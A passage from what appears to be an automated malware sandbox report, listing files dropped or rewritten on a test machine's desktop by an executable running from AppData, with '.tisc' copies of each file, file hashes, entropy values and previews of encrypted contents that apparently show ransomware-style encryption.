                                                                                    C:\Users\user\Desktop\EFOYFBOLXA.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.854455374705948
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ymBuuF4Q2ciBlRTZ8oEd/L/0+2otKg3eB5HYCr/IvF5TwRuwgbD:ymBpFScQf8b/bDtYf4C0t5Tw0pD
                                                                                    MD5:FCFABE73CAE8A504A286968A73AD1A44
                                                                                    SHA1:C8A6179CEB57740A57320045ABB704399D0E2789
                                                                                    SHA-256:7C8F29A0A1870C05CF5D5A74EBBB934843EF3DB901840C68300B583DDAEA9892
                                                                                    SHA-512:8943D8E8D05DB769ACE62AA5B8F935516F5D9CEA459D10043C15CFF403D10962B90DB64F6BD88FE38C14EA63086D93F2CE8C06771F39D081978E8BCB661EAC01
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):153934
                                                                                    Entropy (8bit):7.999010880418484
                                                                                    Encrypted:true
                                                                                    SSDEEP:3072:wfy4rO+nOzszIXYEVpMxm2uCqCYpw1aMuY3YDcfKEiGgBcKws:CTON7V+IXDCjluYID3G0cKd
                                                                                    MD5:21EB9CC145F03A1EF502E11040170494
                                                                                    SHA1:D9923B489B163EDECFF9C91BE047CC3E64E85E8E
                                                                                    SHA-256:F4CC69499024D03BEBFED51D3EFBCF05EA3FB018CDB9FA91BF627F73A23DDAB7
                                                                                    SHA-512:52BBE69DA43F89C96C7897DD49B33933E6A4E2EBD8DFFA8DC3A6D80FC4991C747674093E3F17084DFE1B939D36F4DBC78F758633CB7179B681AE1C00FAF2931D
                                                                                    Malicious:true
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\NZPC0PFaC0.exe.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):153934
                                                                                    Entropy (8bit):7.999010880418484
                                                                                    Encrypted:true
                                                                                    SSDEEP:3072:wfy4rO+nOzszIXYEVpMxm2uCqCYpw1aMuY3YDcfKEiGgBcKws:CTON7V+IXDCjluYID3G0cKd
                                                                                    MD5:21EB9CC145F03A1EF502E11040170494
                                                                                    SHA1:D9923B489B163EDECFF9C91BE047CC3E64E85E8E
                                                                                    SHA-256:F4CC69499024D03BEBFED51D3EFBCF05EA3FB018CDB9FA91BF627F73A23DDAB7
                                                                                    SHA-512:52BBE69DA43F89C96C7897DD49B33933E6A4E2EBD8DFFA8DC3A6D80FC4991C747674093E3F17084DFE1B939D36F4DBC78F758633CB7179B681AE1C00FAF2931D
                                                                                    Malicious:true
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\PIVFAGEAAV.png
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.843253136191442
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:mC29UvV3HEwmMrgyC70F3jT7PxxWrpEU1qEGX10T5CpaQ4blJIr6SaHZWfL/gbD:9sU9XEwrhzBwyeQ1foQkJmviSLyD
                                                                                    MD5:0444D71288AC6192BE3A8988D85B23E7
                                                                                    SHA1:AAB82208B307BD7BBA9D343F207B4554C4FBB81A
                                                                                    SHA-256:4B5D4FF13C994993E8BE280D09DA1C1C1FA53D603D767225FC34BF83E3ECA6FD
                                                                                    SHA-512:1CC9B57B2E8C3617D868EEA97DD1ABBC931C90FA2E3EA22F0A83458776B15C7A722A81F40B772C7B3C0984DB3121ED1B73BB79130ED78D0CA0D334594488B33A
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\PIVFAGEAAV.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.843253136191442
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:mC29UvV3HEwmMrgyC70F3jT7PxxWrpEU1qEGX10T5CpaQ4blJIr6SaHZWfL/gbD:9sU9XEwrhzBwyeQ1foQkJmviSLyD
                                                                                    MD5:0444D71288AC6192BE3A8988D85B23E7
                                                                                    SHA1:AAB82208B307BD7BBA9D343F207B4554C4FBB81A
                                                                                    SHA-256:4B5D4FF13C994993E8BE280D09DA1C1C1FA53D603D767225FC34BF83E3ECA6FD
                                                                                    SHA-512:1CC9B57B2E8C3617D868EEA97DD1ABBC931C90FA2E3EA22F0A83458776B15C7A722A81F40B772C7B3C0984DB3121ED1B73BB79130ED78D0CA0D334594488B33A
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\PWCCAWLGRE.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.826514039643713
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:C3zxFMBiVr6LASFHHYsy0Iim38H8ZtrE+wAzhP9f2+caCwPB7hgbD:ctFMUhrSFHXyxA8br1zhlf2HaCiBUD
                                                                                    MD5:EF39104F7422B1D2F5F315DC00BB83D6
                                                                                    SHA1:0E2A8CA1D58138AA0832E107F43B2C0D5A033CAC
                                                                                    SHA-256:A1625566A3B1881DADC8EF12E4CEDD842781AAD61262454D27810AEED364E310
                                                                                    SHA-512:93916495D6F10DC2E9901E046570B4CCE4526B8B1783FE58EB48769BBF81054062F20F39FB9C22A0428B1853DDE1CB0C2B56309DEDCF77066FCC8CB0532647D0
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\PWCCAWLGRE.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.826514039643713
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:C3zxFMBiVr6LASFHHYsy0Iim38H8ZtrE+wAzhP9f2+caCwPB7hgbD:ctFMUhrSFHXyxA8br1zhlf2HaCiBUD
                                                                                    MD5:EF39104F7422B1D2F5F315DC00BB83D6
                                                                                    SHA1:0E2A8CA1D58138AA0832E107F43B2C0D5A033CAC
                                                                                    SHA-256:A1625566A3B1881DADC8EF12E4CEDD842781AAD61262454D27810AEED364E310
                                                                                    SHA-512:93916495D6F10DC2E9901E046570B4CCE4526B8B1783FE58EB48769BBF81054062F20F39FB9C22A0428B1853DDE1CB0C2B56309DEDCF77066FCC8CB0532647D0
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.844491831926702
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:juEiTbW0DBKGCwB1g6Rr2WGaLLO3S1QZQeXqSxWi+ttHsgbD:CEiTBDBKG7B1OWGAUQ0xWi+ttHlD
                                                                                    MD5:8D2A712EBFF1D1FF55E84657A7509B2C
                                                                                    SHA1:1FD30C236DD7F85D35311EC3B456E0F5ACC62F50
                                                                                    SHA-256:11BF35E388A8B9752DDB8E7623889C4B2F82A2D787F0E5DF19BF1D896C780E0C
                                                                                    SHA-512:0F2E31C8DAF88622C8463A91CD0C69804CF2CA28F0D1FE7ED696649C766603623403085F890C7F1297DD673555FD437DC89E6538C0E8B0ADAA09A9E985B11271
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.844491831926702
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:juEiTbW0DBKGCwB1g6Rr2WGaLLO3S1QZQeXqSxWi+ttHsgbD:CEiTBDBKG7B1OWGAUQ0xWi+ttHlD
                                                                                    MD5:8D2A712EBFF1D1FF55E84657A7509B2C
                                                                                    SHA1:1FD30C236DD7F85D35311EC3B456E0F5ACC62F50
                                                                                    SHA-256:11BF35E388A8B9752DDB8E7623889C4B2F82A2D787F0E5DF19BF1D896C780E0C
                                                                                    SHA-512:0F2E31C8DAF88622C8463A91CD0C69804CF2CA28F0D1FE7ED696649C766603623403085F890C7F1297DD673555FD437DC89E6538C0E8B0ADAA09A9E985B11271
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.842463590961021
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:+3GDUPZtsgO4rbSsPIJL6c4IzST6+bXX6YsywMLQg+ftXKisKbloKPDwi6u0VggX:4qwsghPwJ+7bXXtLQg+ftXqKbyKbwiLW
                                                                                    MD5:C79DD3D4FAFE7A284D9BA63FD57E62D4
                                                                                    SHA1:9ED9DCFEBA6E64AFCF47EB7661CA5387E1BB671A
                                                                                    SHA-256:39324561F1A52F36D109A8BD6506D933E151020A3448C93ED2AB392A41BDAF77
                                                                                    SHA-512:50A6DBDE53346FB800571F060CC2D729B3D82E4A1CC53065C44140EA698F0BF7FD9E252DA355D8A4264E1315EE3C1B12496D15EC7815F8C5927B56C50BA00F07
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.842463590961021
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:+3GDUPZtsgO4rbSsPIJL6c4IzST6+bXX6YsywMLQg+ftXKisKbloKPDwi6u0VggX:4qwsghPwJ+7bXXtLQg+ftXqKbyKbwiLW
                                                                                    MD5:C79DD3D4FAFE7A284D9BA63FD57E62D4
                                                                                    SHA1:9ED9DCFEBA6E64AFCF47EB7661CA5387E1BB671A
                                                                                    SHA-256:39324561F1A52F36D109A8BD6506D933E151020A3448C93ED2AB392A41BDAF77
                                                                                    SHA-512:50A6DBDE53346FB800571F060CC2D729B3D82E4A1CC53065C44140EA698F0BF7FD9E252DA355D8A4264E1315EE3C1B12496D15EC7815F8C5927B56C50BA00F07
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: =`.....X...rm.oO.v*%....\...~...b...o..k.IQAke[....q...M.I.W.2|.lZe...........O..W.%.tl.[R....)V..{/...g..KL. ..9F.i.3...L-......r....,..:.1..:......A|i...G.<MGR..l..Bvr..[M........Xp...{..'..|e..,P.-`.Q....;..2\S.r...=....gc&...Vwn.#.@....|./W.T..'^...]....Y:...v..H....Z:.1...F.\.......U..9s..W.....#Z.D...f.9..>V...0..=.....!.p..|G...<{.....t...&g..B....f..D9B......._n5uz8rd1..nm..6.3.....]."......./..[g,i,..{.R..!,...~k. .,.....p\....5(.........xU.......#7....F...`jX2.gN5."_...7.b..A..2E.9.o......z.]D..3=...........&..To.....#...,_........." ...o....2.C...*?...6$.9....Ur..B.Xl...u...i.f...0..S/o.|....nr.R]..{...U,z..9.U(.S.._9..I!...$U.w"c..e...........C...........gz..`.f....TG.h.A.Od)d.bj7FO.m.$i....W...P..#......D\.KR]..C.Wf..*.Zj.:....%5.P_._...x....[.ix.|..w.~/.M...;.x%b.8.~Ev.=t.....^.'F.b..?.K.]..B.VM%87.u.<V..R...;.b.........N......4Epdc....z....\...%.wz.....9:.......V...v.V.....x......eqAJ;6....6-z..g.Fa.kcM..7.a..N
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\BJZFPPWAPT.mp3
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.828440360950426
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:NvO8LsXQfMhAZR1SLZmLkYJvtvNT2gn0AHn/NwhxZLRWq8Xmrgvs4tRFd0b/8tEQ:NvNwki6ELoA2NT2+H/iqqcdRFds/UXD
                                                                                    MD5:B010A4F1FD84350AB9016038479E711B
                                                                                    SHA1:F2B305B12EF6D05E28137A1BBDD9B098A7FAC120
                                                                                    SHA-256:2BAD9351C5C9F15FE46F3C00C4FE8713002E25DA0189FB24BD87E42534E071D6
                                                                                    SHA-512:4A45DB7A9C1F46C1CB65EF450B10E128A67FD83D0EAF36FC3D8C1F52D1D23F4591075E04645560289E011B34D6EFA5283BB4700294C8757A8A3CEEEDB20E3C36
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...........A,.]..D".tE...v{a.-....My.T..L...T.N...`..r......'.....@,.....O'...."......2{._)x...=.........&;.....n....s.@B.+....{..Y...*pz;r.C.&.~=E~B..... ..M.2..as..4.0L.p....m.z.0..H..R..21...!i.ke.R.>Ln%......q.m!.. y.cN..Z.....]........!...^4..../........k-f.B.X}x..I.y..Ts....7C...n...1....xW..f.?.,..t....RyQ..J......;....+cR.....6j....K..S.<.#=..u..H_..A..E..[....<.X...;.5..tI;....]!.c..V....14[..3U....." g.o5...V,..s..9s...?%.m...DY..u.9...o...l.0........u...:..f.16...G...p..-H...e.cp./..7..h..[.P...Pj...N_.H.{..Ca)a/~.H.|{..T.T....M....m.@].&.k..3K..L...g.!..8.mw.q.......l.|..(~..r..L....Y.CJB.RF...4.g....t..ht$.!O._...I-(...b|.:0(.....).G.e~%...1..4.v{P.F...Bo...s ..qgU....,......b.~...$...,.7...b61.%...F^<$.lm_l.2.:2C..9./.A[YQ.pf..b..1f.E.c<..)....j$..4......g..@1......r5..+I..7(5H...&...G...xs...|8[k'....R...C. C.......w...VY.d..QduX...I......X....+..Fo..8..}..:... ..v.().7........'%...?^...B.~=.t...;..bQ./.._J6.....F
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\BJZFPPWAPT.mp3.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.828440360950426
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:NvO8LsXQfMhAZR1SLZmLkYJvtvNT2gn0AHn/NwhxZLRWq8Xmrgvs4tRFd0b/8tEQ:NvNwki6ELoA2NT2+H/iqqcdRFds/UXD
                                                                                    MD5:B010A4F1FD84350AB9016038479E711B
                                                                                    SHA1:F2B305B12EF6D05E28137A1BBDD9B098A7FAC120
                                                                                    SHA-256:2BAD9351C5C9F15FE46F3C00C4FE8713002E25DA0189FB24BD87E42534E071D6
                                                                                    SHA-512:4A45DB7A9C1F46C1CB65EF450B10E128A67FD83D0EAF36FC3D8C1F52D1D23F4591075E04645560289E011B34D6EFA5283BB4700294C8757A8A3CEEEDB20E3C36
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...........A,.]..D".tE...v{a.-....My.T..L...T.N...`..r......'.....@,.....O'...."......2{._)x...=.........&;.....n....s.@B.+....{..Y...*pz;r.C.&.~=E~B..... ..M.2..as..4.0L.p....m.z.0..H..R..21...!i.ke.R.>Ln%......q.m!.. y.cN..Z.....]........!...^4..../........k-f.B.X}x..I.y..Ts....7C...n...1....xW..f.?.,..t....RyQ..J......;....+cR.....6j....K..S.<.#=..u..H_..A..E..[....<.X...;.5..tI;....]!.c..V....14[..3U....." g.o5...V,..s..9s...?%.m...DY..u.9...o...l.0........u...:..f.16...G...p..-H...e.cp./..7..h..[.P...Pj...N_.H.{..Ca)a/~.H.|{..T.T....M....m.@].&.k..3K..L...g.!..8.mw.q.......l.|..(~..r..L....Y.CJB.RF...4.g....t..ht$.!O._...I-(...b|.:0(.....).G.e~%...1..4.v{P.F...Bo...s ..qgU....,......b.~...$...,.7...b61.%...F^<$.lm_l.2.:2C..9./.A[YQ.pf..b..1f.E.c<..)....j$..4......g..@1......r5..+I..7(5H...&...G...xs...|8[k'....R...C. C.......w...VY.d..QduX...I......X....+..Fo..8..}..:... ..v.().7........'%...?^...B.~=.t...;..bQ./.._J6.....F
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\BNAGMGSPLO.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.857331380680913
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:VmE279RDawz/J7F+Dhw44uogr8rv5BrSeKCF5qJz+1fusZ46gbD:VLyDvTJ7FKLR8D5UeKCF8U1fDS3D
                                                                                    MD5:5B7D97C2A93FC277F74A6A2C458AD552
                                                                                    SHA1:E2FD4668B339DF5306C1458ECE77BCAAF2360B9E
                                                                                    SHA-256:280039571D01DCE14906031D1A12BEA6DA5495C854DE00C47166115FF4F65927
                                                                                    SHA-512:9A3474C28F0D395417A00384365E2100FF5DFB6967D316B30CABE585DFFC655D3DCBD691038F084C7255ABD40537B8EAC79D2B457CD55F38763650DEC9C1E4BC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .o.}...<.......s...J.@..y.....D6...".......o..Ix.t......)...!........~...U..u^...#.g.U...9.hzn.(......P..+...$_.5......6......*=$d._ ....u...|..a......s...Y...........&.!keO=.\kV. b.66v.[.6....O.$}YYa}3.C%..I...Y.b=(.......pfN..<.8i..<.S.R..'...ynZ...A.`u`,.@.."S...U.(.E..:X'U......~.v......../:.f..a........!....}#..z.*W...n....1...L....M....5..e5...AH......3..V:0.n.;.............Y..bn...v..p.p...X..Qa...........j.....:..J!..&p.T...}.~.V.@PU...2x.P7..3v.t....[9.Aoi.4...<..Cq.Xh.9....L$.M.....J...u....[..\.Yqf<...t}1..z....c;s5.t*\...9.B.YRa}6(.6.+...../....m0.r-..B.'..nU....Z.......P9.....j...;..p....^........4....e...\...E.N"..#............Y.xe...@;..Q6......... (...,(..a..*.A....].....|*..W1 ]...Q....Ep7.X.....].P/\..:.....L.(..CB...2..A...)x...r/..Z........$...QS.9.H.VA&y..r......".~..T&.-B.bz.-......S".K]1..lX.3.......;.z.......1...S..-j38.|_.6.c4....\....x.W.....*......WS...|.l.dBF..P.0...^.......u..........)A..w......#.k.T.ZZcXQ.
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\BNAGMGSPLO.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.857331380680913
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:VmE279RDawz/J7F+Dhw44uogr8rv5BrSeKCF5qJz+1fusZ46gbD:VLyDvTJ7FKLR8D5UeKCF8U1fDS3D
                                                                                    MD5:5B7D97C2A93FC277F74A6A2C458AD552
                                                                                    SHA1:E2FD4668B339DF5306C1458ECE77BCAAF2360B9E
                                                                                    SHA-256:280039571D01DCE14906031D1A12BEA6DA5495C854DE00C47166115FF4F65927
                                                                                    SHA-512:9A3474C28F0D395417A00384365E2100FF5DFB6967D316B30CABE585DFFC655D3DCBD691038F084C7255ABD40537B8EAC79D2B457CD55F38763650DEC9C1E4BC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .o.}...<.......s...J.@..y.....D6...".......o..Ix.t......)...!........~...U..u^...#.g.U...9.hzn.(......P..+...$_.5......6......*=$d._ ....u...|..a......s...Y...........&.!keO=.\kV. b.66v.[.6....O.$}YYa}3.C%..I...Y.b=(.......pfN..<.8i..<.S.R..'...ynZ...A.`u`,.@.."S...U.(.E..:X'U......~.v......../:.f..a........!....}#..z.*W...n....1...L....M....5..e5...AH......3..V:0.n.;.............Y..bn...v..p.p...X..Qa...........j.....:..J!..&p.T...}.~.V.@PU...2x.P7..3v.t....[9.Aoi.4...<..Cq.Xh.9....L$.M.....J...u....[..\.Yqf<...t}1..z....c;s5.t*\...9.B.YRa}6(.6.+...../....m0.r-..B.'..nU....Z.......P9.....j...;..p....^........4....e...\...E.N"..#............Y.xe...@;..Q6......... (...,(..a..*.A....].....|*..W1 ]...Q....Ep7.X.....].P/\..:.....L.(..CB...2..A...)x...r/..Z........$...QS.9.H.VA&y..r......".~..T&.-B.bz.-......S".K]1..lX.3.......;.z.......1...S..-j38.|_.6.c4....\....x.W.....*......WS...|.l.dBF..P.0...^.......u..........)A..w......#.k.T.ZZcXQ.
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\EEGWXUHVUG.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.831021873260298
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:af5WlQRr/sqzRm4+C9nzNdm3Ux+FwjrvShLGATWkgGwO9iG5dP/Nb7gbD:af5/R3f9BdNmSATWkVLH5dPVbuD
                                                                                    MD5:C41FF4BCDE97FDA715643C00C38D61ED
                                                                                    SHA1:178D3C85CE5391702EEFAC2516715A02FF8D79EF
                                                                                    SHA-256:0F0AD92DCABE00DF0BEC7C533F8F545EC79162E7EF93819E6ABE4ABC0F936D72
                                                                                    SHA-512:E0193A24D8E17DCC89B48E3C44605980900CE1179375157BF4F68AFC479DD67FB79E4163622DAB115BD3DD0B38E284A8130AE114D7B1E5D680E7B829394727DE
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..F$V.c....6:...+.......s.?..C.j......Iz-........e.U..SD....Nm3.1."...:.........:...]b.%mb....0......j.W.-S..zb+..8S.) ...g*.bP..[......M.+.....{@.....c.*uXs-g.E.8g#O.J..z.8.....e.....oE...y...8j........{...87$.M....t..X.Z 5d.B........E.D..~...X'.@.&...@G....GEY.c....t.a.1.w..Zs..w..e.......... y{\..iLG...=.....)`...6.k....4d..[g.A3z.<N...P..j.....1..+.8?...[K....1...l(c.[.g.A...$.S1.i..?s...c...8..0..B....-..Z.n...b.Jl.+!.Q...A....4...........2.f..]G......-.&.....}...L."..Sw..t:-[P.L..W...)..R.4.8..84q=.f.....%.F.&...7.i.V.........,u~.:}y[.K<.......c(.{.E....W.Q...W,t`....I.8<.bl9tC./.^...#.=.....T..b..~Co..S`v.....:...r.X..Q.....\S0}..}.Q.TgoK...1..5?..M.W{.p...b.nV..............\.#J.W.~.v \.:`6b.D.w..(.....f.L.dO.ZA(...a+...E.H........8..<..{..........ih@#..f.%Pp........D..ex.......i..ct..\....N3....GJ..X.(....U.....;..0A.{.K...Y......Di.:r..a..q!N6I.5....] 1.m2......*...M..]..p..5u...UTsn.P......B..K.(...3...q.1...9.A....s.?..
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\EEGWXUHVUG.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.831021873260298
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:af5WlQRr/sqzRm4+C9nzNdm3Ux+FwjrvShLGATWkgGwO9iG5dP/Nb7gbD:af5/R3f9BdNmSATWkVLH5dPVbuD
                                                                                    MD5:C41FF4BCDE97FDA715643C00C38D61ED
                                                                                    SHA1:178D3C85CE5391702EEFAC2516715A02FF8D79EF
                                                                                    SHA-256:0F0AD92DCABE00DF0BEC7C533F8F545EC79162E7EF93819E6ABE4ABC0F936D72
                                                                                    SHA-512:E0193A24D8E17DCC89B48E3C44605980900CE1179375157BF4F68AFC479DD67FB79E4163622DAB115BD3DD0B38E284A8130AE114D7B1E5D680E7B829394727DE
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..F$V.c....6:...+.......s.?..C.j......Iz-........e.U..SD....Nm3.1."...:.........:...]b.%mb....0......j.W.-S..zb+..8S.) ...g*.bP..[......M.+.....{@.....c.*uXs-g.E.8g#O.J..z.8.....e.....oE...y...8j........{...87$.M....t..X.Z 5d.B........E.D..~...X'.@.&...@G....GEY.c....t.a.1.w..Zs..w..e.......... y{\..iLG...=.....)`...6.k....4d..[g.A3z.<N...P..j.....1..+.8?...[K....1...l(c.[.g.A...$.S1.i..?s...c...8..0..B....-..Z.n...b.Jl.+!.Q...A....4...........2.f..]G......-.&.....}...L."..Sw..t:-[P.L..W...)..R.4.8..84q=.f.....%.F.&...7.i.V.........,u~.:}y[.K<.......c(.{.E....W.Q...W,t`....I.8<.bl9tC./.^...#.=.....T..b..~Co..S`v.....:...r.X..Q.....\S0}..}.Q.TgoK...1..5?..M.W{.p...b.nV..............\.#J.W.~.v \.:`6b.D.w..(.....f.L.dO.ZA(...a+...E.H........8..<..{..........ih@#..f.%Pp........D..ex.......i..ct..\....N3....GJ..X.(....U.....;..0A.{.K...Y......Di.:r..a..q!N6I.5....] 1.m2......*...M..]..p..5u...UTsn.P......B..K.(...3...q.1...9.A....s.?..
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\EFOYFBOLXA.png
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.861926802985309
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:QSy6XiDwTVccZYLWwxpSzv9a9Kh+ySzN9EW9WLOhLkuNMY8ebPU/6jSdTrk+CgbD:QSy6XHpcc4WwxpQa9KoySzhULOhLkI1e
                                                                                    MD5:2A55BCB2C39CF5D3D0971795E2F63209
                                                                                    SHA1:BA44704ED2C9FCE67144625D56CCCE05BBB6B13E
                                                                                    SHA-256:89472EF975C0DC4367ED98C69AB708CA9A74A9850A459FF13DAE3236657AC5F6
                                                                                    SHA-512:AE727E449318370BF80AA2E4C45C3CC7CF4D62ED29F6CA48F8E8D262C343A831D0B77A960C55933B74568AD10312AEFBD7FEB0C0FDBCFB4FFE8A1AE4E98D1B03
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: 3i#Y-......*...m.S. .w...011y....U...J.....A...C...I.K....&.:...UM.]j....r{.ER/.1.....V.+... ..P....b........G..+RV.Or.6...U%v..t.2r.<N..w...Q....1jD.S....~2....5......(.rI...n.O...g&..QA,[.T...._O..C.N..}{..:..@:l ....z.,$....-.(.R..N....R.:...0....r./t"o.q+n..[.i.'..^.a...s..j......N6.# o...P..)...NG... .............{...'.*^.5.`Ii@.;.B..z.<.Yu...{.....6...35k...PX....~.N...}.X..5..:l...z.#...g^_iw.eU...'..\B+..F.n...{..l...E....n....o......I....e&....]}..D.D....-$j...5..Y.(;C.....*,..N.&.|.I.........n.i.N >.D...w.. !.HQ.....&.=q.P.&...C...@..d.s..m...G......,..Af.{.C......Z....;vk.+.U.43.0u....n.T`B....RR..z=....:...J.|.V/ ......4v.{.j.*..xb..O./8.m.....c.m.......k..]H...&.O..K~...j`..i%f./."...T.....U..)..t..Q0....~).9...`K.te...n....c?.....(.i.0f...:.~..G2.G.f...\-X........Pj..|.m....j..C)1..r...WC..h&l.......)..U.u....M.'...m......2...f..}..P..".3.E..."j...A..q.m..@z...D....#.Q.bD%Q....?..H......F.Tz.K..h0`C.i.w......E*.s.....).
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\EFOYFBOLXA.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.861926802985309
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:QSy6XiDwTVccZYLWwxpSzv9a9Kh+ySzN9EW9WLOhLkuNMY8ebPU/6jSdTrk+CgbD:QSy6XHpcc4WwxpQa9KoySzhULOhLkI1e
